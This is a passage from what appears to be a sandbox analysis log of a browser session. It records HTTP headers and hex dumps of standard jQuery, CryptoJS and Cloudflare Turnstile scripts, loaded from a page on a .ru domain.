                                                                              Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                              2024-11-26 19:54:40 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                              Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                              2024-11-26 19:54:40 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                              Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                              2024-11-26 19:54:40 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                              Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                              2024-11-26 19:54:40 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                              Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                              2024-11-26 19:54:40 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                              Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              18192.168.2.1649733104.17.24.144436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:39 UTC650OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                              Host: cdnjs.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://7x7.jaaqwamco.ru/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:54:40 UTC973INHTTP/1.1 200 OK
                                                                              Date: Tue, 26 Nov 2024 19:54:40 GMT
                                                                              Content-Type: application/javascript; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Access-Control-Allow-Origin: *
                                                                              Cache-Control: public, max-age=30672000
                                                                              ETag: W/"61182885-40eb"
                                                                              Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                              cf-cdnjs-via: cfworker/kv
                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                              Timing-Allow-Origin: *
                                                                              X-Content-Type-Options: nosniff
                                                                              CF-Cache-Status: HIT
                                                                              Age: 1482150
                                                                              Expires: Sun, 16 Nov 2025 19:54:40 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9DtBXydoO%2Fix5J3mGhFXCyjf%2F%2BNy8XDJ%2BY%2B%2B5kcZHOmdvCGz%2FcTVri70sJnfHTuiRyLGD%2FhGnEsqolHwFSYKC5VSqsSjprWo%2FnWe7HoV%2Fa5Fgp3UCZpvOA8p9V7d5TindnSKzgqL"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                              Strict-Transport-Security: max-age=15780000
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6e825eaf4314-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-11-26 19:54:40 UTC396INData Raw: 37 62 65 34 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                              Data Ascii: 7be4!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                              2024-11-26 19:54:40 UTC1369INData Raw: 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61
                                                                              Data Ascii: efined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}va
                                                                              2024-11-26 19:54:40 UTC1369INData Raw: 76 61 72 20 74 3d 6f 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66
                                                                              Data Ascii: var t=o.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof
                                                                              2024-11-26 19:54:40 UTC1369INData Raw: 29 7b 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66
                                                                              Data Ascii: ){"string"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){f
                                                                              2024-11-26 19:54:40 UTC1369INData Raw: 63 74 69 6f 6e 20 4e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b
                                                                              Data Ascii: ction N(){for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[
                                                                              2024-11-26 19:54:40 UTC1369INData Raw: 3c 4f 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29
                                                                              Data Ascii: <O[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)
                                                                              2024-11-26 19:54:40 UTC1369INData Raw: 38 41 72 72 61 79 28 74 2e 62 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42
                                                                              Data Ascii: 8Array(t.buffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16B
                                                                              2024-11-26 19:54:40 UTC1369INData Raw: 29 5d 3d 6e 3b 76 61 72 20 6f 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42
                                                                              Data Ascii: )]=n;var o=r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"AB
                                                                              2024-11-26 19:54:40 UTC1369INData Raw: 34 39 36 37 32 39 36 2a 61 2e 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e
                                                                              Data Ascii: 4967296*a.abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>
                                                                              2024-11-26 19:54:40 UTC1369INData Raw: 53 2c 6d 2c 79 2c 32 33 2c 41 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28
                                                                              Data Ascii: S,m,y,23,A[39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              19192.168.2.1649734104.18.95.414436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:39 UTC648OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://7x7.jaaqwamco.ru/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:54:40 UTC386INHTTP/1.1 302 Found
                                                                              Date: Tue, 26 Nov 2024 19:54:40 GMT
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                              cross-origin-resource-policy: cross-origin
                                                                              location: /turnstile/v0/b/a6e12e96a2d5/api.js
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6e825925191e-EWR
                                                                              alt-svc: h3=":443"; ma=86400


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              20192.168.2.1649736104.18.95.414436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:41 UTC647OUTGET /turnstile/v0/b/a6e12e96a2d5/api.js HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
